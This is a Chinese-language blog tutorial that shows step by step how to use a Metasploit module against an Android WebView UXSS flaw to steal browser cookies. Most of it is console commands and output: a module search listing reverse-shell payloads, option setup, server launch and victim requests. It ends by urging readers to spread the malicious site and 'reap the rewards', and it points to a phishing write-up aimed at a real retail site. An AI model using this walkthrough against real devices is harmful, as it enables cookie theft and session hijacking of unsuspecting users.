利用Android的UXSS漏洞完成一次XSS攻擊

標籤：

駭客攻擊的方式思路是先搜集資訊，定位漏洞，然後針對不同的漏洞採用不同的方式來黑掉你。下面用metasploit類比一次跨站指令碼攻擊(黑掉自己的手機)。

1.搜集資訊

msf > search androidMatching Modules================   Name                                                       Disclosure Date  Rank       Description   ----                                                       ---------------  ----       -----------   auxiliary/admin/android/google_play_store_uxss_xframe_rce                   normal     Android Browser RCE Through Google Play Store XFO   auxiliary/gather/android_browser_new_tab_cookie_theft                       normal     Android Browser "Open in New Tab" Cookie Theft   auxiliary/gather/android_htmlfileprovider                                   normal     Android Content Provider File Disclosure   auxiliary/gather/android_object_tag_webview_uxss           2014-10-04       normal     Android Open Source Platform (AOSP) Browser UXSS   auxiliary/gather/android_stock_browser_uxss                                 normal     Android Open Source Platform (AOSP) Browser UXSS   auxiliary/scanner/sip/sipdroid_ext_enum                                     normal     SIPDroid Extension Grabber   exploit/android/browser/samsung_knox_smdm_url              2014-11-12       normal     Samsung Galaxy KNOX Android Browser RCE   exploit/android/browser/webview_addjavascriptinterface     2012-12-21       normal     Android Browser and WebView addJavascriptInterface Code Execution   exploit/android/fileformat/adobe_reader_pdf_js_interface   2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit   exploit/android/local/futex_requeue                        2014-05-03       excellent  Android ‘Towelroot‘ Futex Requeue Kernel Exploit   exploit/multi/handler                                                       manual     Generic Payload Handler   payload/android/meterpreter/reverse_http                                    normal     Android Meterpreter, Dalvik Reverse HTTP Stager   payload/android/meterpreter/reverse_https                                   normal     Android Meterpreter, Dalvik Reverse HTTPS Stager   payload/android/meterpreter/reverse_tcp                                     normal     Android Meterpreter, Dalvik Reverse TCP Stager   payload/android/shell/reverse_http                                          normal     Command Shell, Dalvik Reverse HTTP Stager   payload/android/shell/reverse_https                                         normal     Command Shell, Dalvik Reverse HTTPS Stager   payload/android/shell/reverse_tcp                                           normal     Command Shell, Dalvik Reverse TCP Stager

可以看到安卓可以利用的漏洞有很多,在這裡我選擇了一個UXSS(通用跨站指令碼攻擊)的漏洞,通過搜尋,可以看到漏洞的具體描述。 

這個漏洞的大概意思是如果駭客成功，將從你的瀏覽器中擷取到你頁面的cookie。

2.接下來利用這個漏洞,並查看該模組的選項。

msf > use auxiliary/gather/android_object_tag_webview_uxssmsf auxiliary(android_object_tag_webview_uxss) > show optionsModule options (auxiliary/gather/android_object_tag_webview_uxss):   Name         Current Setting     Required  Description   ----         ---------------     --------  -----------   CUSTOM_JS                        no        A string of javascript to execute in the context of the target URLs.   REMOTE_JS                        no        A URL to inject into a script tag in the context of the target URLs.   SRVHOST      0.0.0.0             yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT      8080                yes       The local port to listen on.   SSL          false               no        Negotiate SSL for incoming connections   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)   TARGET_URLS  http://example.com  yes       The comma-separated list of URLs to steal.   URIPATH                          no        The URI to use for this exploit (default is random)Auxiliary action:   Name       Description   ----       -----------   WebServer  

由可以看到必要欄位有SRVHOST/SRVPORT/TARGET_URLS。這裡才是關鍵。在這一步裡，你需要做的就是搭建自己的網站,以及把擷取cookie並傳回的指令碼嵌入進去!

在這裡我除了SRVHOST外其他選擇預設值，只起示範作用。(後邊我會給出一個具體的例子,看別人的XSS是怎麼做的)

msf auxiliary(android_object_tag_webview_uxss) > set SRVHOST 192.168.1.106SRVHOST => 192.168.1.106

3.假設你的指令碼已經網站已經搞定，接下來輸入“exploit”,服務啟動後基本快要大功告成了。

msf auxiliary(android_object_tag_webview_uxss) > exploit [*] Auxiliary module execution completedmsf auxiliary(android_object_tag_webview_uxss) > [*] Using URL: http://192.168.1.106:8080/ORvS7Li6X[*] Server started.

4.接下來,你需要想辦法把你的網站擴散出去,然後坐享其成就行了。

[*] 192.168.1.105    android_object_tag_webview_uxss - Request ‘GET /ORvS7Li6X‘[*] 192.168.1.105    android_object_tag_webview_uxss - Sending initial HTML ...[*] 192.168.1.105    android_object_tag_webview_uxss - Request ‘GET /ORvS7Li6X‘[*] 192.168.1.105    android_object_tag_webview_uxss - Sending initial HTML ...

 

後記:這篇部落格裡對指令碼製作思路和過程並沒有深入探討,具體思路可以借鑒一下這篇文章。

實戰利用XSS漏洞對me.jd.com進行基礎驗證釣魚

 

 

     

 

利用Android的UXSS漏洞完成一次XSS攻擊